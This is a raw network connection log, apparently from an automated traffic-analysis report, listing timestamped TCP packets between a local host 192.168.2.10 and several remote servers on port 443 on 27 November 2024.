                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:32.865596056 CET4434973213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:32.866091967 CET49732443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:32.866117001 CET4434973213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:32.866591930 CET49732443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:32.866596937 CET4434973213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:32.885977030 CET4434973313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:32.886415005 CET49733443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:32.886457920 CET4434973313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:32.886908054 CET49733443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:32.886914968 CET4434973313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.150540113 CET49738443192.168.2.1052.149.20.212
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.150587082 CET4434973852.149.20.212192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.150690079 CET49738443192.168.2.1052.149.20.212
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.152714968 CET49738443192.168.2.1052.149.20.212
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.152734995 CET4434973852.149.20.212192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.171140909 CET44349734172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.171370029 CET49734443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.172687054 CET49734443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.172702074 CET44349734172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.172966003 CET44349734172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.174196005 CET49734443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.215337992 CET44349734172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.224375963 CET49734443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.224405050 CET44349734172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.317671061 CET4434973213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.317740917 CET4434973213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.317821980 CET49732443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.318070889 CET49732443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.318097115 CET4434973213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.318109035 CET49732443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.318115950 CET4434973213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.321449995 CET49739443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.321496010 CET4434973913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.321598053 CET49739443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.321763992 CET49739443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.321779966 CET4434973913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.334851027 CET4434973313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.334927082 CET4434973313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.335100889 CET49733443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.335625887 CET49733443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.335654974 CET4434973313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.335665941 CET49733443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.335671902 CET4434973313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.338391066 CET49740443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.338424921 CET4434974013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.338505983 CET49740443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.338679075 CET49740443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:33.338691950 CET4434974013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.235165119 CET4434973613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.235702038 CET49736443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.235732079 CET4434973613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.236315966 CET49736443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.236321926 CET4434973613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.301227093 CET4434973513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.302201986 CET49735443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.302232981 CET4434973513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.302901983 CET49735443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.302907944 CET4434973513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.434180975 CET4434973713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.434739113 CET49737443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.434783936 CET4434973713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.435208082 CET49737443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.435214043 CET4434973713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.607405901 CET49677443192.168.2.1020.42.65.85
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.669569016 CET4434973613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.669636011 CET4434973613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.669711113 CET49736443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.670340061 CET49736443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.670358896 CET4434973613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.670368910 CET49736443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.670376062 CET4434973613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.674128056 CET49741443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.674179077 CET4434974113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.674268961 CET49741443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.674516916 CET49741443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.674530029 CET4434974113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.745518923 CET4434973513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.745596886 CET4434973513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.745723963 CET49735443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.745798111 CET49735443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.745824099 CET4434973513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.745840073 CET49735443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.745846033 CET4434973513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.748702049 CET49742443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.748744011 CET4434974213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.751615047 CET49742443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.751950979 CET49742443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.751962900 CET4434974213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.882258892 CET44349734172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.882353067 CET44349734172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.882551908 CET49734443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.882688046 CET49734443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.889175892 CET4434973713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.889233112 CET4434973713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.889307022 CET49737443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.889843941 CET49737443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.889863968 CET4434973713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.889875889 CET49737443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.889882088 CET4434973713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.892887115 CET49743443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.892925978 CET4434974313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.893038034 CET49743443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.893198967 CET49743443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.893223047 CET4434974313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.967879057 CET4434973852.149.20.212192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.967950106 CET49738443192.168.2.1052.149.20.212
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.970050097 CET49738443192.168.2.1052.149.20.212
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.970067978 CET4434973852.149.20.212192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:34.970446110 CET4434973852.149.20.212192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.013659000 CET49738443192.168.2.1052.149.20.212
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.056025982 CET4434974013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.056642056 CET49740443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.056678057 CET4434974013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.057118893 CET49740443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.057127953 CET4434974013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.094053030 CET49744443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.094108105 CET44349744172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.094367981 CET49744443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.094718933 CET49744443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.094742060 CET44349744172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.169651985 CET4434973913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.171262026 CET49739443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.171295881 CET4434973913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.171866894 CET49739443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.171874046 CET4434973913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.491873980 CET4434974013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.491966009 CET4434974013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.492156029 CET49740443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.492259979 CET49740443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.492280960 CET4434974013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.492322922 CET49740443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.492328882 CET4434974013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.494913101 CET49746443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.494959116 CET4434974613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.495153904 CET49746443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.495294094 CET49746443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.495310068 CET4434974613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.625127077 CET4434973913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.625195980 CET4434973913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.625449896 CET49739443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.625510931 CET49739443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.625530958 CET4434973913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.625545025 CET49739443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.625550985 CET4434973913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.628232956 CET49747443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.628271103 CET4434974713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.628366947 CET49747443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.628521919 CET49747443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:35.628535986 CET4434974713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.321470022 CET44349744172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.321557045 CET49744443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.322771072 CET49744443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.322783947 CET44349744172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.323028088 CET44349744172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.324179888 CET49744443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.324357986 CET49744443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.324385881 CET44349744172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.324472904 CET49744443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.324480057 CET44349744172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.543319941 CET4434974113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.544027090 CET49741443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.544054985 CET4434974113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.544518948 CET49741443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.544526100 CET4434974113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.616069078 CET4434974213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.616714001 CET49742443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.616733074 CET4434974213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.617407084 CET49742443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.617414951 CET4434974213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.680560112 CET4434974313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.681294918 CET49743443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.681308985 CET4434974313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.681864023 CET49743443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.681869984 CET4434974313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.684990883 CET49738443192.168.2.1052.149.20.212
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.727335930 CET4434973852.149.20.212192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.996578932 CET4434974113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.996654987 CET4434974113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.996748924 CET49741443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.996932983 CET49741443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.996932983 CET49741443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.996952057 CET4434974113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.996956110 CET4434974113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.999749899 CET49749443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.999799013 CET4434974913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:36.999881029 CET49749443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.000056028 CET49749443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.000072002 CET4434974913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.130954981 CET4434974213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.131055117 CET4434974213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.131159067 CET49742443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.131495953 CET49742443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.131495953 CET49742443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.131513119 CET4434974213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.131522894 CET4434974213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.134587049 CET49750443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.134640932 CET4434975013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.134742975 CET49750443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.134989023 CET49750443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.135004044 CET4434975013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.370958090 CET4434974313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.371026993 CET4434974313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.371299982 CET49743443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.371344090 CET49743443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.371344090 CET49743443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.371362925 CET4434974313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.371375084 CET4434974313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.371530056 CET4434973852.149.20.212192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.371561050 CET4434973852.149.20.212192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.371568918 CET4434973852.149.20.212192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.371578932 CET4434973852.149.20.212192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.371603012 CET4434973852.149.20.212192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.371644020 CET49738443192.168.2.1052.149.20.212
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.371661901 CET4434973852.149.20.212192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.371687889 CET49738443192.168.2.1052.149.20.212
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.371721029 CET49738443192.168.2.1052.149.20.212
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.373439074 CET4434974613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.374166965 CET49751443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.374197006 CET4434975113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.374705076 CET49746443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.374723911 CET4434974613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.374744892 CET49751443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.375140905 CET49746443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.375147104 CET4434974613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.375273943 CET49751443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.375288010 CET4434975113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.494957924 CET4434973852.149.20.212192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.495032072 CET49738443192.168.2.1052.149.20.212
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.495059967 CET4434973852.149.20.212192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.495065928 CET4434973852.149.20.212192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.495116949 CET49738443192.168.2.1052.149.20.212
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.608184099 CET44349744172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.608323097 CET44349744172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.608405113 CET49744443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.608650923 CET49744443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.608670950 CET44349744172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.818120003 CET4434974613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.818181992 CET4434974613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.818253040 CET49746443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.818449020 CET49746443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.818475008 CET4434974613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.818490028 CET49746443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.818495989 CET4434974613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.822104931 CET49753443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.822149038 CET4434975313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.822263956 CET49753443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.822536945 CET49753443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.822562933 CET4434975313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.881675005 CET4434974713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.882205009 CET49747443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.882234097 CET4434974713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.882889986 CET49747443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.882895947 CET4434974713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.986943007 CET49754443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.986988068 CET44349754172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.987189054 CET49754443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.987488031 CET49754443192.168.2.10172.67.160.80
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:37.987505913 CET44349754172.67.160.80192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:38.319888115 CET4434974713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:38.319961071 CET4434974713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:38.320046902 CET49747443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:38.320233107 CET49747443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:38.320251942 CET4434974713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:38.320288897 CET49747443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:38.320295095 CET4434974713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:38.322846889 CET49755443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:38.322881937 CET4434975513.107.246.43192.168.2.10
